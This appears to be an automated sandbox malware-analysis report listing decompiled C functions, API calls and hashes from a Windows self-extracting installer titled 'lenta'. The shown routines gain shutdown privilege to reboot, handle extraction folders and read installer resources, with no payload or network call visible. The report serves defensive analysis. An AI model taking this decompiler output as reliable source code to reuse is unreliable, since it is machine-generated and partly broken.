                                                                                                                                                                                                                                                0x00025ef7
                                                                                                                                                                                                                                                0x00025ef2
                                                                                                                                                                                                                                                0x00025f4c
                                                                                                                                                                                                                                                0x00025f4e
                                                                                                                                                                                                                                                0x00025f50
                                                                                                                                                                                                                                                0x00025f54
                                                                                                                                                                                                                                                0x00025ed4
                                                                                                                                                                                                                                                0x00025ea2
                                                                                                                                                                                                                                                0x00025ea4
                                                                                                                                                                                                                                                0x00025eaf
                                                                                                                                                                                                                                                0x00025eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e79
                                                                                                                                                                                                                                                0x00025e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e83
                                                                                                                                                                                                                                                0x00025e85
                                                                                                                                                                                                                                                0x00025e85
                                                                                                                                                                                                                                                0x00025e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025e94
                                                                                                                                                                                                                                                0x00025e8e
                                                                                                                                                                                                                                                0x00025e7d
                                                                                                                                                                                                                                                0x00025e77
                                                                                                                                                                                                                                                0x00025e6e
                                                                                                                                                                                                                                                0x00025e65
                                                                                                                                                                                                                                                0x00025e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dd0
                                                                                                                                                                                                                                                0x00025dce
                                                                                                                                                                                                                                                0x00025dca
                                                                                                                                                                                                                                                0x00025dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d00
                                                                                                                                                                                                                                                0x00025dd9
                                                                                                                                                                                                                                                0x00025e04
                                                                                                                                                                                                                                                0x000261fe
                                                                                                                                                                                                                                                0x00025e0a
                                                                                                                                                                                                                                                0x00025e0c
                                                                                                                                                                                                                                                0x00025e17
                                                                                                                                                                                                                                                0x00025e17
                                                                                                                                                                                                                                                0x00025e04
                                                                                                                                                                                                                                                0x00026200
                                                                                                                                                                                                                                                0x00026200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 00025CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00028B3E,00000104,00000000,?,?), ref: 00025DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00025E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 00025EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00025F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00025FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 00026008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 000260AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00021140,00000000,00000040,00000000), ref: 000261F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 000261F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: 1ece995c77dd352938fa4f715fa2b2cc83c3fbdc5375919e1728c0ca47b5e9bb
                                                                                                                                                                                                                                                • Instruction ID: b5790fbfb057b068c95780ec36cd00b0fc9faaf16e833828389be4cddceae9ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ece995c77dd352938fa4f715fa2b2cc83c3fbdc5375919e1728c0ca47b5e9bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06D17071A04E745FEFB58B38BC4C3FA77E19B16306F2440EAC486C6191DA758E878B49
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E00021F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                				int _t28;
                                                                                                                                                                                                                                                				signed char _t30;
                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t41 = __esi;
                                                                                                                                                                                                                                                				_t38 = __edi;
                                                                                                                                                                                                                                                				_t30 = __ecx;
                                                                                                                                                                                                                                                				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                                						if( *0x29a40 != 0) {
                                                                                                                                                                                                                                                							_pop(_t30);
                                                                                                                                                                                                                                                							_t44 = _t46;
                                                                                                                                                                                                                                                							_t13 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                                							_push(_t38);
                                                                                                                                                                                                                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                                								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                                								_v12 = 2;
                                                                                                                                                                                                                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                                								_t41 = _t41;
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                                										_t25 = 1;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t37 = 0x4f7;
                                                                                                                                                                                                                                                										goto L3;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t37 = 0x4f6;
                                                                                                                                                                                                                                                									goto L4;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t37 = 0x4f5;
                                                                                                                                                                                                                                                								L3:
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								L4:
                                                                                                                                                                                                                                                								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								E000244B9(0, _t37);
                                                                                                                                                                                                                                                								_t25 = 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_pop(_t40);
                                                                                                                                                                                                                                                							return E00026CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t37 = 0x522;
                                                                                                                                                                                                                                                						_t28 = E000244B9(0, 0x522, 0x21140, 0, 0x40, 4);
                                                                                                                                                                                                                                                						if(_t28 != 6) {
                                                                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					__eax = E00021EA7(__ecx);
                                                                                                                                                                                                                                                					if(__eax != 2) {
                                                                                                                                                                                                                                                						L16:
                                                                                                                                                                                                                                                						return _t28;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                0x00021fcf
                                                                                                                                                                                                                                                0x00021fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fd3
                                                                                                                                                                                                                                                0x00021fa9
                                                                                                                                                                                                                                                0x00021fb4
                                                                                                                                                                                                                                                0x00021fbb
                                                                                                                                                                                                                                                0x00021fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fc3
                                                                                                                                                                                                                                                0x00021f9a
                                                                                                                                                                                                                                                0x00021f9a
                                                                                                                                                                                                                                                0x00021fa2
                                                                                                                                                                                                                                                0x00021fd9
                                                                                                                                                                                                                                                0x00021fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00021EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00021F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00021FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 74657fe935480b152b0e099ba7798e7ee3fff2b760d59a327819dc4e5d0b3921
                                                                                                                                                                                                                                                • Instruction ID: 066d0d44d37b6bb8b1b694d34160a2f68be1989e9836a707e50dbe15f604bea2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74657fe935480b152b0e099ba7798e7ee3fff2b760d59a327819dc4e5d0b3921
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC21A971B402157BEB705BA1BD4AFFF76F8EB95B10F200029FA16D6181DB7988029661
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00026CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x00026cf7
                                                                                                                                                                                                                                                0x00026d00
                                                                                                                                                                                                                                                0x00026d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00026E26,00021000), ref: 00026CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00026E26,?,00026E26,00021000), ref: 00026D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00026E26,00021000), ref: 00026D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00026E26,00021000), ref: 00026D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: b13f452a60df67c71d6b5cd50f57dc804a006e52916854b18daa185c018df3bf
                                                                                                                                                                                                                                                • Instruction ID: 04b1bb948f83a3fb8cd808168b80c1460327d8f35ffa679abc332f163c510404
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b13f452a60df67c71d6b5cd50f57dc804a006e52916854b18daa185c018df3bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14D0C932200108BBFB202BE1EC0CA597F28EB4A232F644000F31982020CF3A44628B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E00023210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				int _t20;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				int _t23;
                                                                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                                				int _t27;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                                                                				int _t39;
                                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                				CHAR* _t49;
                                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                                				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E000243D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x29a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x291e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E000244B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x291e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x291e5 - 3;
						if(_t49 - 0x291e5 < 3) {
							goto L32;
						}
						_t24 =  *0x291e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x291e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0002658A(0x291e4, 0x104, 0x21140);
								_t27 = E000258C8(0x291e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x291e4 - 0x5c;
									if( *0x291e4 != 0x5c) {
										L30:
										_t30 = E0002597D(0x291e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x291e5 - 0x5c;
									if( *0x291e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E000244B9(_t64, 0x54a, 0x291e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x291e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x291e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x291e4 - 0x5c;
						if( *0x291e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x29124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x29a3c, 0x3e8, 0x28598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00024224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t39 = SetDlgItemTextA(_t64, 0x835, 0x287a0);
                                                                                                                                                                                                                                                						__eflags = _t39;
                                                                                                                                                                                                                                                						if(_t39 != 0) {
                                                                                                                                                                                                                                                							goto L36;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t63 = 0x4c0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						E000244B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						goto L38;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t63 = 0x4b1;
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023329
                                                                                                                                                                                                                                                0x0002332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002332b
                                                                                                                                                                                                                                                0x0002324c
                                                                                                                                                                                                                                                0x0002324c
                                                                                                                                                                                                                                                0x0002324f
                                                                                                                                                                                                                                                0x000232c8
                                                                                                                                                                                                                                                0x000232ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232ce
                                                                                                                                                                                                                                                0x00023251
                                                                                                                                                                                                                                                0x00023256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023271
                                                                                                                                                                                                                                                0x00023277
                                                                                                                                                                                                                                                0x00023279
                                                                                                                                                                                                                                                0x00023298
                                                                                                                                                                                                                                                0x0002329d
                                                                                                                                                                                                                                                0x0002329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232b0
                                                                                                                                                                                                                                                0x000232b6
                                                                                                                                                                                                                                                0x000232b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000232be
                                                                                                                                                                                                                                                0x00023280
                                                                                                                                                                                                                                                0x00023289
                                                                                                                                                                                                                                                0x0002328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002328e
                                                                                                                                                                                                                                                0x0002327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,00028598,00000200), ref: 00023271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 000233E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000233F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00023410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 00023426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 0002342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0002343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-2207793050
                                                                                                                                                                                                                                                • Opcode ID: cf5d80e24ea61f5b7ce2c1bbc1839caf59d5035aefbcab4a99a64df21348e7d9
                                                                                                                                                                                                                                                • Instruction ID: 57ae641635a32d666355b360404b535e52b49a16374baeea09c5c6eab8779692
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf5d80e24ea61f5b7ce2c1bbc1839caf59d5035aefbcab4a99a64df21348e7d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66513A30341270BBFB71AB357C8DFBF6999DB46B64F204068F645961D1CEAC9B029261
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00022CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				struct HRSRC__* _t31;
                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t13 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                                				_t65 = 0;
                                                                                                                                                                                                                                                				_t66 = __ecx;
                                                                                                                                                                                                                                                				_t48 = __edx;
                                                                                                                                                                                                                                                				 *0x29a3c = __ecx;
                                                                                                                                                                                                                                                				memset(0x29140, 0, 0x8fc);
                                                                                                                                                                                                                                                				memset(0x28a20, 0, 0x32c);
                                                                                                                                                                                                                                                				memset(0x288c0, 0, 0x104);
                                                                                                                                                                                                                                                				 *0x293ec = 1;
                                                                                                                                                                                                                                                				_t20 = E0002468F("TITLE", 0x29154, 0x7f);
                                                                                                                                                                                                                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                                					_t64 = 0x4b1;
                                                                                                                                                                                                                                                					goto L32;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                                					 *0x2858c = _t27;
                                                                                                                                                                                                                                                					SetEvent(_t27);
                                                                                                                                                                                                                                                					_t64 = 0x29a34;
                                                                                                                                                                                                                                                					if(E0002468F("EXTRACTOPT", 0x29a34, 4) != 0) {
                                                                                                                                                                                                                                                						if(( *0x29a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                                							 *0x29120 =  *0x29120 & _t65;
                                                                                                                                                                                                                                                							if(E00025C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                                								if( *0x28a3a == 0) {
                                                                                                                                                                                                                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                                									if(_t31 != 0) {
                                                                                                                                                                                                                                                										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x28184 != 0) {
                                                                                                                                                                                                                                                										__imp__#17();
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									if( *0x28a24 == 0) {
                                                                                                                                                                                                                                                										_t57 = _t65;
                                                                                                                                                                                                                                                										if(E000236EE(_t65) == 0) {
                                                                                                                                                                                                                                                											goto L33;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t33 =  *0x29a40; // 0x3
                                                                                                                                                                                                                                                											_t48 = 1;
                                                                                                                                                                                                                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                                												if(( *0x29a34 & 0x00000100) == 0 || ( *0x28a38 & 0x00000001) != 0 || E000218A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t64 = 0x7d6;
                                                                                                                                                                                                                                                													if(E00026517(_t57, 0x7d6, _t34, E000219E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                                														goto L33;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												L30:
                                                                                                                                                                                                                                                												_t23 = _t48;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t23 = 1;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00022390(0x28a3a);
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t64 = 0x520;
